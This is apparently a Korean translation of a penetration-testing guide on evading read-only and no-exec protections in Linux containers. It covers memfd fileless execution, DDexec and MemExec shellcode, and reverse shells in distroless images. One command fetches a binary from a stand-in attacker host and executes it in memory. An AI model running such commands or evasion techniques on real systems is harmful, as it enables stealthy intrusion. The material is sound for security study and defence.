해킹 경력에 관심이 있고 해킹할 수 없는 것을 해킹하고 싶다면 - 채용 중입니다! (유창한 폴란드어 필수).

비디오

다음 비디오에서는 이 페이지에서 언급된 기술에 대해 더 자세히 설명된 내용을 찾을 수 있습니다:

• DEF CON 31 - 은밀하고 회피를 위한 리눅스 메모리 조작 탐색

• DDexec-ng 및 메모리 dlopen()을 사용한 은밀한 침입 - HackTricks Track 2023

읽기 전용 / 실행 불가 시나리오

특히 컨테이너에서 읽기 전용 (ro) 파일 시스템 보호로 마운트된 리눅스 머신을 더 많이 찾을 수 있습니다. 이는 securitycontext에서 **readOnlyRootFilesystem: true**를 설정하는 것만큼 쉽기 때문입니다:

apiVersion: v1
kind: Pod
metadata:
name: alpine-pod
spec:
containers:
- name: alpine
image: alpine
securityContext:
      readOnlyRootFilesystem: true
    command: ["sh", "-c", "while true; do sleep 1000; done"]

그러나 파일 시스템이 ro로 마운트되어 있더라도 **/dev/shm**은 여전히 쓰기 가능하므로 디스크에 아무것도 쓸 수 없는 것은 가짜입니다. 그러나 이 폴더는 실행 불가 보호로 마운트되므로 여기에 바이너리를 다운로드하면 실행할 수 없습니다.

가장 쉬운 우회: 스크립트

바이너리를 언급했지만, 인터프리터가 머신 내에 있으면 쉘 스크립트(sh가 설치되어 있으면)나 파이썬 스크립트(python이 설치되어 있으면)와 같이 스크립트를 실행할 수 있습니다.

그러나 이겢으로 바이너리 백도어나 실행해야 할 다른 바이너리 도구를 실행해야 하는 경우에는 이것만으로 충분하지 않습니다.

메모리 우회

파일 시스템이 실행을 허용하지 않더라도 바이너리를 실행하려면 메모리에서 실행하는 것이 가장 좋습니다. 왜냐하면 보호 기능이 적용되지 않기 때문입니다.

FD + exec 시스템 호출 우회

Python, Perl, 또는 Ruby와 같은 강력한 스크립트 엔진이 머신 내에 있는 경우, 메모리에서 실행할 바이너리를 다운로드하고, 이를 메모리 파일 디스크립터(create_memfd 시스템 호출)에 저장한 다음 exec 시스템 호출을 호출하여 fd를 실행할 파일로 지정할 수 있습니다.

이를 위해 fileless-elf-exec 프로젝트를 쉽게 사용할 수 있습니다. 이 프로젝트에 바이너리를 전달하면 바이너리를 압축하고 b64로 인코딩하고 해당 fd에 디코딩 및 압축 해제 지시가 포함된 지정된 언어의 스크립트를 생성하여 create_memfd 시스템 호출을 통해 만든 fd에 저장하고 실행하기 위해 exec 시스템 호출을 호출합니다.

DDexec / EverythingExec

DDexec / EverythingExec는 자체 프로세스 메모리를 수정하여 **/proc/self/mem**을 덮어쓰는 기술로, 프로세스가 실행하는 어셈블리 코드를 제어하여 쉘코드를 작성하고 프로세스를 임의의 코드를 실행하도록 변형할 수 있습니다.

# Basic example
wget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo bar

MemExec

Memexec은 DDexec의 자연스러운 다음 단계입니다. DDexec 셸코드를 데몬화한 것으로, 다른 이진 파일을 실행하려는 경우에 DDexec을 다시 시작할 필요가 없습니다. 대신 DDexec 기술을 통해 memexec 셸코드를 실행한 다음 이 데몬과 통신하여 새로운 이진 파일을 전달하고 실행할 수 있습니다.

memexec를 사용하여 PHP 역쉘에서 이진 파일을 실행하는 예제는 https://github.com/arget13/memexec/blob/main/a.php에서 찾을 수 있습니다.

Memdlopen

DDexec과 유사한 목적을 가진 memdlopen 기술은 메모리에 이진 파일을 로드하여 나중에 실행하는 더 쉬운 방법을 제공합니다. 이를 통해 종속성이 있는 이진 파일을 로드할 수도 있습니다.

Distroless Bypass

Distroless란

Distroless 컨테이너에는 특정 응용 프로그램이나 서비스를 실행하는 데 필요한 최소한의 구성 요소만 포함되어 있습니다. 패키지 관리자, 셸 또는 시스템 유틸리티와 같은 큰 구성 요소는 제외됩니다.

Distroless 컨테이너의 목표는 불필요한 구성 요소를 제거함으로써 컨테이너의 공격 표면을 줄이고 악용될 수 있는 취약점의 수를 최소화하는 것입니다.

역쉘

Distroless 컨테이너에서는 보통 sh나 bash와 같은 일반적인 셸을 얻을 수 없을 수 있습니다. 또한 시스템에서 보통 실행하는 ls, whoami, id와 같은 이진 파일도 찾을 수 없습니다.

그러나 kompromat된 컨테이너가 예를 들어 플라스크 웹을 실행 중이라면 파이썬이 설치되어 있으므로 Python 역쉘을 얻을 수 있습니다. Node를 실행 중이라면 Node 역쉘을 얻을 수 있고, 대부분의 스크립팅 언어도 마찬가지입니다.

read-only/no-exec 보호 기능이 없는 경우에는 역쉘을 악용하여 파일 시스템에 이진 파일을 작성하고 실행할 수 있습니다.

RCE 취약점을 악용하여 스크립팅 언어 역쉘을 얻고 메모리에서 이진 파일을 실행하는 방법에 대한 예제는 https://github.com/carlospolop/DistrolessRCE에서 찾을 수 있습니다.

해킹 경력에 관심이 있고 해킹할 수 없는 것을 해킹하고 싶다면! (유창한 폴란드어 작문 및 구사 능력 필요).